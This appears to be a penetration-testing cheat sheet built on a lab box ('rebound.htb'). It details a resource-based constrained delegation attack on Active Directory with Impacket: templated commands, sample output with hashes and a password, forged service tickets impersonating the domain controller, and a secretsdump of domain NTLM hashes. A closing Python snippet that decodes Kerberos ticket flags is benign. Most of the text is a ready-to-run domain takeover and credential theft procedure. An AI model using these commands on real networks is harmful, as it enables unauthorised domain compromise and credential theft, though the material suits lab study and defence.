Abuse #1: RBCD Attack
1. Find delegation
# Check delegation
sudo ntpdate -s <DC> && impacket-findDelegation '<DOMAIN>/<USER>' -dc-ip <DC> -hashes :<HASH> -k -no-pass
Sample Output:
$ sudo ntpdate -s dc01.rebound.htb && impacket-findDelegation 'rebound.htb/delegator$' -dc-ip dc01.rebound.htb -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -k -no-pass
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[*] Getting machine hostname
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------------------------------- -------------- --------------------- ----------
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb No
2. RBCD Attack
# Add delegation
sudo ntpdate -s <DC> && impacket-rbcd '<DOMAIN>/<USER>' -hashes :<HASH> -k -delegate-from '<TARGET_1>' -delegate-to '<USER>' -action write -dc-ip <DC> -use-ldaps
Sample Output:
$ sudo ntpdate -s dc01.rebound.htb && impacket-rbcd 'rebound.htb/delegator$' -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -k -delegate-from 'ldap_monitor' -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
# Check
sudo ntpdate -s <DC> && impacket-findDelegation '<DOMAIN>/<USER>' -dc-ip <DC> -hashes :<HASH> -k -no-pass
Sample Output:
$ sudo ntpdate -s dc01.rebound.htb && impacket-findDelegation 'rebound.htb/delegator$' -dc-ip dc01.rebound.htb -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -k -no-pass
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName AccountType DelegationType DelegationRightsTo
------------ ----------------------------------- -------------------------- ---------------------
ldap_monitor Person Resource-Based Constrained delegator$
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb
3. Get a service ticket
# Impersonate
impacket-getST '<DOMAIN>/<TARGET_1>:<TARGET_1_PASSWORD>' -spn <SERVICE_1>/<TARGET_DOMAIN> -impersonate '<TARGET_2>'
Sample Output:
$ impacket-getST 'rebound.htb/ldap_monitor:1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate 'DC01$'
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache
# Check forwardable flag
impacket-describeTicket <TICKET_1>.ccache
Sample Output:
$ impacket-describeTicket 'DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache'
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : a1633e3d4f841386c7845309a671bcbb
[*] User Name : DC01$
[*] User Realm : rebound.htb
[*] Service Name : browser/dc01.rebound.htb
[*] Service Realm : REBOUND.HTB
[*] Start Time : 23/09/2024 04:58:00 AM
[*] End Time : 23/09/2024 14:57:58 PM
[*] RenewTill : 24/09/2024 04:57:56 AM
[*] Flags : (0x40a10000) forwardable, renewable, pre_authent, enc_pa_rep
[*] KeyType : rc4_hmac
[*] Base64(key) : oWM+PU+EE4bHhFMJpnG8uw==
[*] Kerberoast hash : $krb5tgs$18$USER$REBOUND.HTB$*browser/dc01.rebound.htb*$33332d861 ...[SNIP]... 27870efddc
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : browser/dc01.rebound.htb
[*] Service Realm : REBOUND.HTB
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied
4. Impersonate
impacket-getST -spn <SERVICE_2>/<TARGET_DOMAIN> -impersonate <TARGET_2> '<DOMAIN>/<USER>' -hashes :<HASH> -additional-ticket <TICKET_1>.ccache
Sample Output:
$ impacket-getST -spn http/dc01.rebound.htb -impersonate DC01$ 'rebound.htb/delegator$' -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -additional-ticket DC01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*] Using additional ticket DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache
5. Secrets Dump
export KRB5CCNAME='<TICKET_2>.ccache'
Sample Output:
$ export KRB5CCNAME='DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache'
impacket-secretsdump -no-pass -k <DC> -just-dc-ntlm
Sample Output:
$ impacket-secretsdump -no-pass -k dc01.rebound.htb -just-dc-ntlm
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1108b27a9ff61ed4139d1443fbcf664b:::
...[SNIP]...
[*] Cleaning up..
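The "Flags : (0x40a10000)" line that describeTicket prints in step 3 is the raw RFC 4120 TicketFlags bitstring; the decoder below reproduces the flag names from that value so the forwardable bit can be checked directly when reviewing a ticket cache during an investigation. This is an added example, not part of the original notes or of Impacket; the bit layout follows RFC 4120 section 5.3.1 with enc_pa_rep (RFC 6806) and anonymous (RFC 8062), and the sample line is copied from the output above.

```python
# Decode the TicketFlags value shown by impacket-describeTicket.
# Added example, not part of the original notes or of Impacket.
import re

# RFC 4120 bit positions: bit 0 is the most significant bit of the 32-bit field.
TICKET_FLAG_BITS = {
    0: "reserved", 1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy",
    5: "may_postdate", 6: "postdated", 7: "invalid", 8: "renewable", 9: "initial",
    10: "pre_authent", 11: "hw_authent", 12: "transited_policy_checked",
    13: "ok_as_delegate", 15: "enc_pa_rep", 16: "anonymous",
}

FLAGS_LINE_RE = re.compile(r"Flags\s*:\s*\((0x[0-9a-fA-F]+)\)")


def decode_ticket_flags(value: int) -> list[str]:
    """Return the names of the flags set in a 32-bit TicketFlags value, MSB first."""
    names = []
    for bit, name in sorted(TICKET_FLAG_BITS.items()):
        if value & (1 << (31 - bit)):
            names.append(name)
    return names


def flags_from_describe_output(output: str) -> list[str]:
    """Locate the '[*] Flags : (0x...)' line in describeTicket output and decode it."""
    match = FLAGS_LINE_RE.search(output)
    if not match:
        raise ValueError("no Flags line found in describeTicket output")
    return decode_ticket_flags(int(match.group(1), 16))


def is_forwardable(output: str) -> bool:
    """True when the ticket carries the forwardable flag that S4U2Proxy relies on."""
    return "forwardable" in flags_from_describe_output(output)


# Constructed sample: the Flags line from the describeTicket output in step 3.
SAMPLE = "[*] Flags : (0x40a10000) forwardable, renewable, pre_authent, enc_pa_rep"

if __name__ == "__main__":
    print(flags_from_describe_output(SAMPLE))
    # -> ['forwardable', 'renewable', 'pre_authent', 'enc_pa_rep']
```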